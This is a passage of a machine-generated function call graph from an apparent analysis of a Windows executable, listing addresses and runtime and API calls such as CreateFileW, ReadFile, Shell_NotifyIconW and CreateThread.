103320->103321 103321->103312 103321->103313 103323 92c2c9 8 API calls 103322->103323 103324 925761 103323->103324 103324->103292 103324->103293 103325->103297 103326->103312 103328 927be7 103327->103328 103333 927c1b __fread_nolock 103327->103333 103329 96644e 103328->103329 103330 927c0e 103328->103330 103328->103333 103332 94014b 8 API calls 103329->103332 103331 927d74 8 API calls 103330->103331 103331->103333 103334 96645d 103332->103334 103333->103306 103335 94017b 8 API calls 103334->103335 103336 966491 __fread_nolock 103335->103336 103337->103307 103338->103100 103340 928ec0 52 API calls 103339->103340 103341 9a89ed 103340->103341 103344 9a8a32 ISource 103341->103344 103377 9a9730 103341->103377 103343 9a8aa6 103343->103344 103351 928ec0 52 API calls 103343->103351 103364 9a8cde 103343->103364 103409 984ad3 8 API calls __fread_nolock 103343->103409 103410 9a8f7a 41 API calls _strftime 103343->103410 103344->103103 103345 9a8eac 103426 9a9941 59 API calls 103345->103426 103346 9a8cec 103390 9a88e3 103346->103390 103349 9a8ebb 103349->103346 103350 9a8ec7 103349->103350 103350->103344 103351->103343 103356 9a8d25 103404 93ffe0 103356->103404 103359 9a8d5f 103412 927e12 103359->103412 103360 9a8d45 103411 993fe1 81 API calls __wsopen_s 103360->103411 103363 9a8d50 GetCurrentProcess TerminateProcess 103363->103359 103364->103345 103364->103346 103369 9a8f22 103369->103344 103373 9a8f36 FreeLibrary 103369->103373 103370 9a8d9e 103424 9a95d8 74 API calls 103370->103424 103373->103344 103375 9a8daf 103375->103369 103376 92b4c8 8 API calls 103375->103376 103425 931ca0 8 API calls 103375->103425 103427 9a95d8 74 API calls 103375->103427 103376->103375 103378 92c2c9 8 API calls 103377->103378 103379 9a974b CharLowerBuffW 103378->103379 103428 989805 103379->103428 103383 92bf73 8 API calls 103384 9a9787 103383->103384 103385 92acc0 8 API calls 103384->103385 103386 9a979b 103385->103386 103387 92adf4 8 API calls 103386->103387 103389 9a97a5 _wcslen 103387->103389 103388 9a98bb _wcslen 103388->103343 103389->103388 103435 9a8f7a 41 API calls _strftime 103389->103435 103391 9a8949 103390->103391 103392 9a88fe 103390->103392 103396 9a9af3 103391->103396 103393 94017b 8 API calls 103392->103393 103394 9a8920 103393->103394 103394->103391 103395 94014b 8 API calls 103394->103395 103395->103394 103397 9a9d08 ISource 103396->103397 103402 9a9b17 _strcat _wcslen ___std_exception_copy 103396->103402 103397->103356 103398 92c98d 39 API calls 103398->103402 103399 92c63f 39 API calls 103399->103402 103400 92ca5b 39 API calls 103400->103402 103401 928ec0 52 API calls 103401->103402 103402->103397 103402->103398 103402->103399 103402->103400 103402->103401 103438 98f8c5 10 API calls _wcslen 103402->103438 103405 93fff5 103404->103405 103406 94008d Sleep 103405->103406 103407 94005b 103405->103407 103408 94007b CloseHandle 103405->103408 103406->103407 103407->103359 103407->103360 103408->103407 103409->103343 103410->103343 103411->103363 103413 927e1a 103412->103413 103414 94014b 8 API calls 103413->103414 103415 927e28 103414->103415 103439 928445 103415->103439 103418 928470 103442 92c760 103418->103442 103420 94017b 8 API calls 103422 92851c 103420->103422 103421 928480 103421->103420 103421->103422 103422->103375 103423 931ca0 8 API calls 103422->103423 103423->103370 103424->103375 103425->103375 103426->103349 103427->103375 103429 989825 _wcslen 103428->103429 103430 98985a 103429->103430 103431 989919 103429->103431 103434 989914 103429->103434 103430->103434 103436 93e36b 41 API calls 103430->103436 103431->103434 103437 93e36b 41 API calls 103431->103437 103434->103383 103434->103389 103435->103388 103436->103430 103437->103431 103438->103402 103440 94014b 8 API calls 103439->103440 103441 927e30 103440->103441 103441->103418 103443 92c76b 103442->103443 103444 971285 103443->103444 103449 92c773 ISource 103443->103449 103445 94014b 8 API calls 103444->103445 103447 971291 103445->103447 103446 92c77a 103446->103421 103449->103446 103450 92c7e0 8 API calls ISource 103449->103450 103450->103449 103485 9902aa 103451->103485 103454 99040b 103457 990471 103454->103457 103458 99041b 103454->103458 103455 9903f3 103501 9905e9 56 API calls __fread_nolock 103455->103501 103459 9904a1 103457->103459 103460 990507 103457->103460 103474 990399 __fread_nolock 103457->103474 103482 990453 103458->103482 103502 992855 10 API calls 103458->103502 103463 9904d1 103459->103463 103464 9904a6 103459->103464 103461 9905b0 103460->103461 103462 990510 103460->103462 103461->103474 103510 92c63f 39 API calls 103461->103510 103465 99058d 103462->103465 103466 990515 103462->103466 103463->103474 103506 92ca5b 39 API calls 103463->103506 103464->103474 103505 92ca5b 39 API calls 103464->103505 103465->103474 103509 92c63f 39 API calls 103465->103509 103468 990554 103466->103468 103476 99051b 103466->103476 103468->103474 103508 92c63f 39 API calls 103468->103508 103474->103108 103475 990427 103503 992855 10 API calls 103475->103503 103476->103474 103507 92c63f 39 API calls 103476->103507 103480 99043e __fread_nolock 103504 992855 10 API calls 103480->103504 103492 991844 103482->103492 103483->103109 103484->103111 103486 9902f7 103485->103486 103489 9902bb 103485->103489 103521 92c98d 39 API calls 103486->103521 103488 928ec0 52 API calls 103488->103489 103489->103488 103490 9902f5 103489->103490 103511 944d98 103489->103511 103490->103454 103490->103455 103490->103474 103493 99184f 103492->103493 103494 94014b 8 API calls 103493->103494 103495 991856 103494->103495 103496 991883 103495->103496 103497 991862 103495->103497 103498 94017b 8 API calls 103496->103498 103499 94017b 8 API calls 103497->103499 103500 99186b ___scrt_fastfail 103498->103500 103499->103500 103500->103474 103501->103474 103502->103475 103503->103480 103504->103482 103505->103474 103506->103474 103507->103474 103508->103474 103509->103474 103510->103474 103512 944da6 103511->103512 103513 944e1b 103511->103513 103520 944dcb 103512->103520 103522 94f649 20 API calls __dosmaperr 103512->103522 103524 944e2d 40 API calls 4 library calls 103513->103524 103516 944e28 103516->103489 103517 944db2 103523 952b5c 26 API calls pre_c_initialization 103517->103523 103519 944dbd 103519->103489 103520->103489 103521->103490 103522->103517 103523->103519 103524->103516 103535 98e80e 103525->103535 103527 98ddd4 Process32NextW 103528 98de86 CloseHandle 103527->103528 103534 98ddcd 103527->103534 103528->103119 103529 92bf73 8 API calls 103529->103534 103530 92b329 8 API calls 103530->103534 103531 92568e 8 API calls 103531->103534 103532 927bb5 8 API calls 103532->103534 103534->103527 103534->103528 103534->103529 103534->103530 103534->103531 103534->103532 103541 93e36b 41 API calls 103534->103541 103536 98e819 103535->103536 103537 98e830 103536->103537 103540 98e836 103536->103540 103542 946722 GetStringTypeW _strftime 103536->103542 103543 94666b 39 API calls _strftime 103537->103543 103540->103534 103541->103534 103542->103536 103543->103540 103544->103122 103545->103125 103547 9918b6 103546->103547 103548 94014b 8 API calls 103547->103548 103549 9918bd 103548->103549 103552 98fcb5 103549->103552 103551 9918f7 103551->103133 103553 92c2c9 8 API calls 103552->103553 103554 98fcc8 CharLowerBuffW 103553->103554 103559 98fcdb 103554->103559 103555 98fd19 103557 98fd2b 103555->103557 103560 92655e 8 API calls 103555->103560 103556 92655e 8 API calls 103556->103559 103558 94017b 8 API calls 103557->103558 103564 98fd59 103558->103564 103559->103555 103559->103556 103569 98fce5 ___scrt_fastfail 103559->103569 103560->103557 103561 98fd7b 103570 98fe0c 103561->103570 103564->103561 103585 98fbed 8 API calls 103564->103585 103565 98fdb8 103566 94014b 8 API calls 103565->103566 103565->103569 103567 98fdd2 103566->103567 103568 94017b 8 API calls 103567->103568 103568->103569 103569->103551 103571 92bf73 8 API calls 103570->103571 103572 98fe3e 103571->103572 103573 92bf73 8 API calls 103572->103573 103574 98fe47 103573->103574 103575 92bf73 8 API calls 103574->103575 103578 98fe50 103575->103578 103576 990114 103576->103565 103577 9466f8 GetStringTypeW 103577->103578 103578->103576 103578->103577 103579 928577 8 API calls 103578->103579 103581 946641 39 API calls 103578->103581 103582 98fe0c 40 API calls 103578->103582 103583 92ad40 8 API calls 103578->103583 103584 92bed9 8 API calls 103578->103584 103586 946722 GetStringTypeW _strftime 103578->103586 103579->103578 103581->103578 103582->103578 103583->103578 103584->103578 103585->103564 103586->103578 103588 99193d 103587->103588 103601 991a56 103587->103601 103589 99195d 103588->103589 103591 99198a 103588->103591 103592 9919a1 103588->103592 103589->103591 103594 991971 103589->103594 103590 94017b 8 API calls 103605 99197f __fread_nolock 103590->103605 103591->103590 103593 94017b 8 API calls 103592->103593 103602 9919be 103592->103602 103593->103602 103596 94017b 8 API calls 103594->103596 103595 9919e5 103597 94017b 8 API calls 103595->103597 103596->103605 103598 9919eb 103597->103598 103606 93c277 8 API calls 103598->103606 103599 94014b 8 API calls 103599->103601 103601->103138 103602->103594 103602->103595 103602->103605 103603 9919f7 103607 93f9d4 WideCharToMultiByte 103603->103607 103605->103599 103606->103603 103608 93fa35 103607->103608 103609 93f9fe 103607->103609 103616 93fe8a 8 API calls 103608->103616 103610 94017b 8 API calls 103609->103610 103612 93fa05 WideCharToMultiByte 103610->103612 103615 93fa3e 8 API calls __fread_nolock 103612->103615 103613 93fa29 103613->103605 103615->103613 103616->103613 103618 923996 ___scrt_fastfail 103617->103618 103639 925f32 103618->103639 103621 923a1c 103623 923a3a Shell_NotifyIconW 103621->103623 103624 9640cd Shell_NotifyIconW 103621->103624 103643 9261a9 103623->103643 103626 923a50 103626->103154 103628 923969 103627->103628 103629 923919 ___scrt_fastfail 103627->103629 103628->103154 103630 923938 Shell_NotifyIconW 103629->103630 103630->103628 103631->103154 103633 94017b 8 API calls 103632->103633 103634 927afa 103633->103634 103635 94014b 8 API calls 103634->103635 103636 927b08 103635->103636 103636->103154 103637->103154 103638->103154 103640 9239eb 103639->103640 103641 925f4e 103639->103641 103640->103621 103673 98d11f 42 API calls _strftime 103640->103673 103641->103640 103642 965070 DestroyIcon 103641->103642 103642->103640 103644 9261c6 103643->103644 103645 9262a8 103643->103645 103646 927ad5 8 API calls 103644->103646 103645->103626 103647 9261d4 103646->103647 103648 9261e1 103647->103648 103649 965278 LoadStringW 103647->103649 103650 928577 8 API calls 103648->103650 103651 965292 103649->103651 103652 9261f6 103650->103652 103655 92bed9 8 API calls 103651->103655 103658 926229 ___scrt_fastfail 103651->103658 103653 926203 103652->103653 103660 9652ae 103652->103660 103653->103651 103654 92620d 103653->103654 103656 926b7c 8 API calls 103654->103656 103655->103658 103657 92621b 103656->103657 103659 927bb5 8 API calls 103657->103659 103662 92628e Shell_NotifyIconW 103658->103662 103659->103658 103660->103658 103661 9652f1 103660->103661 103663 92bf73 8 API calls 103660->103663 103675 93fe6f 51 API calls 103661->103675 103662->103645 103664 9652d8 103663->103664 103674 98a350 9 API calls 103664->103674 103667 965310 103669 926b7c 8 API calls 103667->103669 103668 9652e3 103670 927bb5 8 API calls 103668->103670 103671 965321 103669->103671 103670->103661 103672 926b7c 8 API calls 103671->103672 103672->103658 103673->103621 103674->103668 103675->103667 103677 94017b 8 API calls 103676->103677 103678 93c209 103677->103678 103679 94014b 8 API calls 103678->103679 103680 93c215 103679->103680 103680->103167 103681->103165 103682->103170 103683->103218 103684->103199 103685->103218 103686->103214 103687->103218 103688->103055 103689->103055 103690->103063 103691->103058 103692->102960 103693->102952 103694->102953 103695->102953 103713 92cf80 103696->103713 103698 92bfb5 103699 970db6 103698->103699 103700 92bfc3 103698->103700 103701 92b4c8 8 API calls 103699->103701 103702 94014b 8 API calls 103700->103702 103703 970dc1 103701->103703 103704 92bfd4 103702->103704 103705 92bf73 8 API calls 103704->103705 103706 92bfde 103705->103706 103707 92bfed 103706->103707 103708 92bed9 8 API calls 103706->103708 103709 94014b 8 API calls 103707->103709 103708->103707 103710 92bff7 103709->103710 103721 92be7b 39 API calls 103710->103721 103712 92c01b 103712->102869 103714 92d1c7 103713->103714 103717 92cf93 103713->103717 103714->103698 103716 92bf73 8 API calls 103716->103717 103717->103716 103719 92d03d 103717->103719 103722 9405b2 5 API calls __Init_thread_wait 103717->103722 103723 940413 29 API calls __onexit 103717->103723 103724 940568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103717->103724 103719->103698 103721->103712 103722->103717 103723->103717 103724->103717 103725 93235c 103734 932365 __fread_nolock 103725->103734 103726 928ec0 52 API calls 103726->103734 103727 9774e3 103737 9813c8 8 API calls __fread_nolock 103727->103737 103729 9774ef 103733 92bed9 8 API calls 103729->103733 103735 931ff7 __fread_nolock 103729->103735 103730 9323b6 103731 927d74 8 API calls 103730->103731 103731->103735 103732 94014b 8 API calls 103732->103734 103733->103735 103734->103726 103734->103727 103734->103730 103734->103732 103734->103735 103736 94017b 8 API calls 103734->103736 103736->103734 103737->103729 104368 95947a 104369 959487 104368->104369 104373 95949f 104368->104373 104425 94f649 20 API calls __dosmaperr 104369->104425 104371 95948c 104426 952b5c 26 API calls pre_c_initialization 104371->104426 104374 9594fa 104373->104374 104382 959497 104373->104382 104427 960144 21 API calls 2 library calls 104373->104427 104388 94dcc5 104374->104388 104377 959512 104395 958fb2 104377->104395 104379 959519 104380 94dcc5 __fread_nolock 26 API calls 104379->104380 104379->104382 104381 959545 104380->104381 104381->104382 104383 94dcc5 __fread_nolock 26 API calls 104381->104383 104384 959553 104383->104384 104384->104382 104385 94dcc5 __fread_nolock 26 API calls 104384->104385 104386 959563 104385->104386 104387 94dcc5 __fread_nolock 26 API calls 104386->104387 104387->104382 104389 94dce6 104388->104389 104390 94dcd1 104388->104390 104389->104377 104428 94f649 20 API calls __dosmaperr 104390->104428 104392 94dcd6 104429 952b5c 26 API calls pre_c_initialization 104392->104429 104394 94dce1 104394->104377 104396 958fbe ___BuildCatchObject 104395->104396 104397 958fc6 104396->104397 104398 958fde 104396->104398 104496 94f636 20 API calls __dosmaperr 104397->104496 104400 9590a4 104398->104400 104403 959017 104398->104403 104503 94f636 20 API calls __dosmaperr 104400->104503 104402 958fcb 104497 94f649 20 API calls __dosmaperr 104402->104497 104406 959026 104403->104406 104407 95903b 104403->104407 104404 9590a9 104504 94f649 20 API calls __dosmaperr 104404->104504 104498 94f636 20 API calls __dosmaperr 104406->104498 104430 9554ba EnterCriticalSection 104407->104430 104411 959033 104505 952b5c 26 API calls pre_c_initialization 104411->104505 104412 95902b 104499 94f649 20 API calls __dosmaperr 104412->104499 104413 959041 104415 959072 104413->104415 104416 95905d 104413->104416 104431 9590c5 104415->104431 104500 94f649 20 API calls __dosmaperr 104416->104500 104418 958fd3 __fread_nolock 104418->104379 104421 95906d 104502 95909c LeaveCriticalSection __wsopen_s 104421->104502 104422 959062 104501 94f636 20 API calls __dosmaperr 104422->104501 104425->104371 104426->104382 104427->104374 104428->104392 104429->104394 104430->104413 104432 9590d7 104431->104432 104433 9590ef 104431->104433 104522 94f636 20 API calls __dosmaperr 104432->104522 104434 959459 104433->104434 104440 959134 104433->104440 104539 94f636 20 API calls __dosmaperr 104434->104539 104437 9590dc 104523 94f649 20 API calls __dosmaperr 104437->104523 104439 95945e 104540 94f649 20 API calls __dosmaperr 104439->104540 104441 9590e4 104440->104441 104443 95913f 104440->104443 104449 95916f 104440->104449 104441->104421 104524 94f636 20 API calls __dosmaperr 104443->104524 104444 95914c 104541 952b5c 26 API calls pre_c_initialization 104444->104541 104446 959144 104525 94f649 20 API calls __dosmaperr 104446->104525 104450 959188 104449->104450 104451 9591ae 104449->104451 104452 9591ca 104449->104452 104450->104451 104485 959195 104450->104485 104526 94f636 20 API calls __dosmaperr 104451->104526 104506 953b93 104452->104506 104454 9591b3 104527 94f649 20 API calls __dosmaperr 104454->104527 104459 9591ba 104528 952b5c 26 API calls pre_c_initialization 104459->104528 104460 959333 104464 9593a9 104460->104464 104467 95934c GetConsoleMode 104460->104467 104461 952d38 _free 20 API calls 104462 9591ea 104461->104462 104465 952d38 _free 20 API calls 104462->104465 104466 9593ad ReadFile 104464->104466 104468 9591f1 104465->104468 104469 9593c7 104466->104469 104470 959421 GetLastError 104466->104470 104467->104464 104471 95935d 104467->104471 104472 959216 104468->104472 104473 9591fb 104468->104473 104469->104470 104480 95939e 104469->104480 104474 95942e 104470->104474 104482 959385 104470->104482 104471->104466 104475 959363 ReadConsoleW 104471->104475 104531 9597a4 104472->104531 104529 94f649 20 API calls __dosmaperr 104473->104529 104537 94f649 20 API calls __dosmaperr 104474->104537 104475->104480 104481 95937f GetLastError 104475->104481 104476 952d38 _free 20 API calls 104476->104441 104489 959403 104480->104489 104490 9593ec 104480->104490 104491 9591c5 __fread_nolock 104480->104491 104481->104482 104482->104491 104534 94f613 20 API calls __dosmaperr 104482->104534 104483 959200 104530 94f636 20 API calls __dosmaperr 104483->104530 104484 959433 104538 94f636 20 API calls __dosmaperr 104484->104538 104513 95fc1b 104485->104513 104489->104491 104492 95941a 104489->104492 104535 958de1 31 API calls 3 library calls 104490->104535 104491->104476 104536 958c21 29 API calls __wsopen_s 104492->104536 104495 95941f 104495->104491 104496->104402 104497->104418 104498->104412 104499->104411 104500->104422 104501->104421 104502->104418 104503->104404 104504->104411 104505->104418 104507 953bd1 104506->104507 104511 953ba1 _abort 104506->104511 104543 94f649 20 API calls __dosmaperr 104507->104543 104509 953bbc RtlAllocateHeap 104510 953bcf 104509->104510 104509->104511 104510->104461 104511->104507 104511->104509 104542 94521d 7 API calls 2 library calls 104511->104542 104514 95fc35 104513->104514 104515 95fc28 104513->104515 104518 95fc41 104514->104518 104545 94f649 20 API calls __dosmaperr 104514->104545 104544 94f649 20 API calls __dosmaperr 104515->104544 104517 95fc2d 104517->104460 104518->104460 104520 95fc62 104546 952b5c 26 API calls pre_c_initialization 104520->104546 104522->104437 104523->104441 104524->104446 104525->104444 104526->104454 104527->104459 104528->104491 104529->104483 104530->104491 104547 95970b 104531->104547 104534->104491 104535->104491 104536->104495 104537->104484 104538->104491 104539->104439 104540->104444 104541->104441 104542->104511 104543->104510 104544->104517 104545->104520 104546->104517 104548 955737 __wsopen_s 26 API calls 104547->104548 104549 95971d 104548->104549 104550 959725 104549->104550 104551 959736 SetFilePointerEx 104549->104551 104556 94f649 20 API calls __dosmaperr 104550->104556 104553 95972a 104551->104553 104554 95974e GetLastError 104551->104554 104553->104485 104557 94f613 20 API calls __dosmaperr 104554->104557 104556->104553 104557->104553 104558 92dd3d 104559 92dd63 104558->104559 104560 9719c2 104558->104560 104561 92dead 104559->104561 104564 94014b 8 API calls 104559->104564 104563 971a82 104560->104563 104567 971a26 104560->104567 104571 971a46 104560->104571 104568 94017b 8 API calls 104561->104568 104603 993fe1 81 API calls __wsopen_s 104563->104603 104570 92dd8d 104564->104570 104565 971a7d 104601 93e6e8 207 API calls 104567->104601 104577 92dee4 __fread_nolock 104568->104577 104572 94014b 8 API calls 104570->104572 104570->104577 104571->104565 104602 993fe1 81 API calls __wsopen_s 104571->104602 104574 92dddb 104572->104574 104573 94017b 8 API calls 104573->104577 104574->104567 104575 92de16 104574->104575 104576 930340 207 API calls 104575->104576 104578 92de29 104576->104578 104577->104571 104577->104573 104578->104565 104578->104577 104579 971aa5 104578->104579 104580 92de77 104578->104580 104582 92d526 104578->104582 104604 993fe1 81 API calls __wsopen_s 104579->104604 104580->104561 104580->104582 104583 94014b 8 API calls 104582->104583 104584 92d589 104583->104584 104585 92c32d 8 API calls 104584->104585 104586 92d5b3 104585->104586 104587 94014b 8 API calls 104586->104587 104593 92d66e ISource 104587->104593 104588 92c3ab 8 API calls 104598 92d9ac ISource 104588->104598 104589 92bed9 8 API calls 104589->104593 104590 92b4c8 8 API calls 104590->104593 104592 971f79 104605 9856ae 8 API calls ISource 104592->104605 104593->104589 104593->104590 104593->104592 104594 971f94 104593->104594 104596 92c3ab 8 API calls 104593->104596 104597 92d911 ISource 104593->104597 104596->104593 104597->104588 104597->104598 104599 92d9c3 104598->104599 104600 93e30a 8 API calls ISource 104598->104600 104600->104598 104601->104571 104602->104565 104603->104565 104604->104565 104605->104594 103738 971ac5 103739 971acd 103738->103739 103742 92d535 103738->103742 103784 987a87 8 API calls __fread_nolock 103739->103784 103741 971adf 103785 987a00 8 API calls __fread_nolock 103741->103785 103744 94014b 8 API calls 103742->103744 103746 92d589 103744->103746 103745 971b09 103747 930340 207 API calls 103745->103747 103768 92c32d 103746->103768 103748 971b30 103747->103748 103750 971b44 103748->103750 103786 9a61a2 53 API calls _wcslen 103748->103786 103753 94014b 8 API calls 103764 92d66e ISource 103753->103764 103754 971b61 103754->103742 103787 987a87 8 API calls __fread_nolock 103754->103787 103756 92c3ab 8 API calls 103766 92d9ac ISource 103756->103766 103757 92bed9 8 API calls 103757->103764 103758 92b4c8 8 API calls 103758->103764 103760 971f79 103788 9856ae 8 API calls ISource 103760->103788 103761 971f94 103764->103757 103764->103758 103764->103760 103764->103761 103765 92d911 ISource 103764->103765 103775 92c3ab 103764->103775 103765->103756 103765->103766 103767 92d9c3 103766->103767 103783 93e30a 8 API calls ISource 103766->103783 103772 92c33d 103768->103772 103769 92c345 103769->103753 103770 94014b 8 API calls 103770->103772 103771 92bf73 8 API calls 103771->103772 103772->103769 103772->103770 103772->103771 103773 92bed9 8 API calls 103772->103773 103774 92c32d 8 API calls 103772->103774 103773->103772 103774->103772 103776 92c3b9 103775->103776 103782 92c3e1 ISource 103775->103782 103777 92c3c7 103776->103777 103778 92c3ab 8 API calls 103776->103778 103779 92c3cd 103777->103779 103780 92c3ab 8 API calls 103777->103780 103778->103777 103779->103782 103789 92c7e0 8 API calls ISource 103779->103789 103780->103779 103782->103764 103783->103766 103784->103741 103785->103745 103786->103754 103787->103754 103788->103761 103789->103782 103790 92f4c0 103793 93a025 103790->103793 103792 92f4cc 103794 93a046 103793->103794 103795 93a0a3 103793->103795 103794->103795 103797 930340 207 API calls 103794->103797 103800 93a0e7 103795->103800 103802 993fe1 81 API calls __wsopen_s 103795->103802 103799 93a077 103797->103799 103798 97806b 103798->103798 103799->103795 103799->103800 103801 92bed9 8 API calls 103799->103801 103800->103792 103801->103795 103802->103798 103803 921044 103808 922793 103803->103808 103805 92104a 103844 940413 29 API calls __onexit 103805->103844 103807 921054 103845 922a38 103808->103845 103812 92280a 103813 92bf73 8 API calls 103812->103813 103814 922814 103813->103814 103815 92bf73 8 API calls 103814->103815 103816 92281e 103815->103816 103817 92bf73 8 API calls 103816->103817 103818 922828 103817->103818 103819 92bf73 8 API calls 103818->103819 103820 922866 103819->103820 103821 92bf73 8 API calls 103820->103821 103822 922932 103821->103822 103855 922dbc 103822->103855 103826 922964 103827 92bf73 8 API calls 103826->103827 103828 92296e 103827->103828 103829 933160 9 API calls 103828->103829 103830 922999 103829->103830 103882 923166 103830->103882 103832 9229b5 103833 9229c5 GetStdHandle 103832->103833 103834 9639e7 103833->103834 103835 922a1a 103833->103835 103834->103835 103836 9639f0 103834->103836 103838 922a27 OleInitialize 103835->103838 103837 94014b 8 API calls 103836->103837 103839 9639f7 103837->103839 103838->103805 103889 990ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 103839->103889 103841 963a00 103890 9912eb CreateThread 103841->103890 103843 963a0c CloseHandle 103843->103835 103844->103807 103891 922a91 103845->103891 103848 922a91 8 API calls 103849 922a70 103848->103849 103850 92bf73 8 API calls 103849->103850 103851 922a7c 103850->103851 103852 928577 8 API calls 103851->103852 103853 9227c9 103852->103853 103854 92327e 6 API calls 103853->103854 103854->103812 103856 92bf73 8 API calls 103855->103856 103857 922dcc 103856->103857 103858 92bf73 8 API calls 103857->103858 103859 922dd4 103858->103859 103898 9281d6 103859->103898 103862 9281d6 8 API calls 103863 922de4 103862->103863 103864 92bf73 8 API calls 103863->103864 103865 922def 103864->103865 103866 94014b 8 API calls 103865->103866 103867 92293c 103866->103867 103868 923205 103867->103868 103869 923213 103868->103869 103870 92bf73 8 API calls 103869->103870 103871 92321e 103870->103871 103872 92bf73 8 API calls 103871->103872 103873 923229 103872->103873 103874 92bf73 8 API calls 103873->103874 103875 923234 103874->103875 103876 92bf73 8 API calls 103875->103876 103877 92323f 103876->103877 103878 9281d6 8 API calls 103877->103878 103879 92324a 103878->103879 103880 94014b 8 API calls 103879->103880 103881 923251 RegisterWindowMessageW 103880->103881 103881->103826 103883 923176 103882->103883 103884 963c8f 103882->103884 103886 94014b 8 API calls 103883->103886 103901 993c4e 8 API calls 103884->103901 103888 92317e 103886->103888 103887 963c9a 103888->103832 103889->103841 103890->103843 103902 9912d1 14 API calls 103890->103902 103892 92bf73 8 API calls 103891->103892 103893 922a9c 103892->103893 103894 92bf73 8 API calls 103893->103894 103895 922aa4 103894->103895 103896 92bf73 8 API calls 103895->103896 103897 922a66 103896->103897 103897->103848 103899 92bf73 8 API calls 103898->103899 103900 922ddc 103899->103900 103900->103862 103901->103887 103903 958782 103908 95853e 103903->103908 103906 9587aa 103913 95856f try_get_first_available_module 103908->103913 103910 95876e 103927 952b5c 26 API calls pre_c_initialization 103910->103927 103912 9586c3 103912->103906 103920 960d04 103912->103920 103916 9586b8 103913->103916 103923 94917b 40 API calls 2 library calls 103913->103923 103915 95870c 103915->103916 103924 94917b 40 API calls 2 library calls 103915->103924 103916->103912 103926 94f649 20 API calls __dosmaperr 103916->103926 103918 95872b 103918->103916 103925 94917b 40 API calls 2 library calls 103918->103925 103928 960401 103920->103928 103922 960d1f 103922->103906 103923->103915 103924->103918 103925->103916 103926->103910 103927->103912 103929 96040d ___BuildCatchObject 103928->103929 103930 96041b 103929->103930 103932 960454 103929->103932 103986 94f649 20 API calls __dosmaperr 103930->103986 103939 9609db 103932->103939 103933 960420 103987 952b5c 26 API calls pre_c_initialization 103933->103987 103938 96042a __fread_nolock 103938->103922 103989 9607af 103939->103989 103942 960a26 104007 955594 103942->104007 103943 960a0d 104021 94f636 20 API calls __dosmaperr 103943->104021 103946 960a12 104022 94f649 20 API calls __dosmaperr 103946->104022 103947 960a2b 103948 960a34 103947->103948 103949 960a4b 103947->103949 104023 94f636 20 API calls __dosmaperr 103948->104023 104020 96071a CreateFileW 103949->104020 103953 960478 103988 9604a1 LeaveCriticalSection __wsopen_s 103953->103988 103954 960a39 104024 94f649 20 API calls __dosmaperr 103954->104024 103955 960b01 GetFileType 103958 960b53 103955->103958 103959 960b0c GetLastError 103955->103959 103957 960ad6 GetLastError 104026 94f613 20 API calls __dosmaperr 103957->104026 104029 9554dd 21 API calls 2 library calls 103958->104029 104027 94f613 20 API calls __dosmaperr 103959->104027 103960 960a84 103960->103955 103960->103957 104025 96071a CreateFileW 103960->104025 103964 960b1a CloseHandle 103964->103946 103967 960b43 103964->103967 103966 960ac9 103966->103955 103966->103957 104028 94f649 20 API calls __dosmaperr 103967->104028 103968 960b74 103970 960bc0 103968->103970 104030 96092b 72 API calls 3 library calls 103968->104030 103975 960bed 103970->103975 104031 9604cd 72 API calls 4 library calls 103970->104031 103971 960b48 103971->103946 103974 960be6 103974->103975 103976 960bfe 103974->103976 104032 958a2e 103975->104032 103976->103953 103978 960c7c CloseHandle 103976->103978 104047 96071a CreateFileW 103978->104047 103980 960ca7 103981 960cb1 GetLastError 103980->103981 103985 960cdd 103980->103985 104048 94f613 20 API calls __dosmaperr 103981->104048 103983 960cbd 104049 9556a6 21 API calls 2 library calls 103983->104049 103985->103953 103986->103933 103987->103938 103988->103938 103990 9607d0 103989->103990 103992 9607ea 103989->103992 103990->103992 104057 94f649 20 API calls __dosmaperr 103990->104057 104050 96073f 103992->104050 103994 9607df 104058 952b5c 26 API calls pre_c_initialization 103994->104058 103996 960822 103997 960851 103996->103997 104059 94f649 20 API calls __dosmaperr 103996->104059 104005 9608a4 103997->104005 104061 94da7d 26 API calls 2 library calls 103997->104061 104000 96089f 104002 96091e 104000->104002 104000->104005 104001 960846 104060 952b5c 26 API calls pre_c_initialization 104001->104060 104062 952b6c 11 API calls _abort 104002->104062 104005->103942 104005->103943 104006 96092a 104008 9555a0 ___BuildCatchObject 104007->104008 104065 9532d1 EnterCriticalSection 104008->104065 104010 9555ee 104066 95569d 104010->104066 104011 9555cc 104069 955373 104011->104069 104012 9555a7 104012->104010 104012->104011 104017 95563a EnterCriticalSection 104012->104017 104015 955617 __fread_nolock 104015->103947 104017->104010 104018 955647 LeaveCriticalSection 104017->104018 104018->104012 104020->103960 104021->103946 104022->103953 104023->103954 104024->103946 104025->103966 104026->103946 104027->103964 104028->103971 104029->103968 104030->103970 104031->103974 104095 955737 104032->104095 104034 958a3e 104035 958a44 104034->104035 104037 958a76 104034->104037 104040 955737 __wsopen_s 26 API calls 104034->104040 104108 9556a6 21 API calls 2 library calls 104035->104108 104037->104035 104038 955737 __wsopen_s 26 API calls 104037->104038 104041 958a82 CloseHandle 104038->104041 104039 958a9c 104042 958abe 104039->104042 104109 94f613 20 API calls __dosmaperr 104039->104109 104043 958a6d 104040->104043 104041->104035 104044 958a8e GetLastError 104041->104044 104042->103953 104046 955737 __wsopen_s 26 API calls 104043->104046 104044->104035 104046->104037 104047->103980 104048->103983 104049->103985 104052 960757 104050->104052 104051 960772 104051->103996 104052->104051 104063 94f649 20 API calls __dosmaperr 104052->104063 104054 960796 104064 952b5c 26 API calls pre_c_initialization 104054->104064 104056 9607a1 104056->103996 104057->103994 104058->103992 104059->104001 104060->103997 104061->104000 104062->104006 104063->104054 104064->104056 104065->104012 104077 953319 LeaveCriticalSection 104066->104077 104068 9556a4 104068->104015 104078 954ff0 104069->104078 104071 955392 104086 952d38 104071->104086 104072 955385 104072->104071 104085 953778 11 API calls 2 library calls 104072->104085 104075 9553e4 104075->104010 104076 9554ba EnterCriticalSection 104075->104076 104076->104010 104077->104068 104084 954ffd _abort 104078->104084 104079 95503d 104093 94f649 20 API calls __dosmaperr 104079->104093 104080 955028 RtlAllocateHeap 104081 95503b 104080->104081 104080->104084 104081->104072 104084->104079 104084->104080 104092 94521d 7 API calls 2 library calls 104084->104092 104085->104072 104087 952d6c __dosmaperr 104086->104087 104088 952d43 RtlFreeHeap 104086->104088 104087->104075 104088->104087 104089 952d58 104088->104089 104094 94f649 20 API calls __dosmaperr 104089->104094 104091 952d5e GetLastError 104091->104087 104092->104084 104093->104081 104094->104091 